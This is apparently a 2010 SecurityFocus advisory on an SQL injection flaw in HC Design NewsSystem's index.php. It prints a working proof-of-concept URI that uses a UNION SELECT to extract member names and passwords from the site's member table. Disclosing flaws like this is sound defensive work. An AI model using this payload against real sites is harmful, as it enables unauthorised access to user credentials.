HC Design NewsSystem Index.PHP SQL Injection Vulnerability

Attackers can exploit this issue via a browser.

The following proof-of-concept URI is available:

http://www.example.com/path/index.php?option=news&aktion=komm&ID=-1/**/UNION/**/SELECT/**/null,null,mname,null,mpassword,null,null/**/FROM/**/hcmitglieder/**/WHERE/**/id=1/


 

Privacy Statement
Copyright 2010, SecurityFocus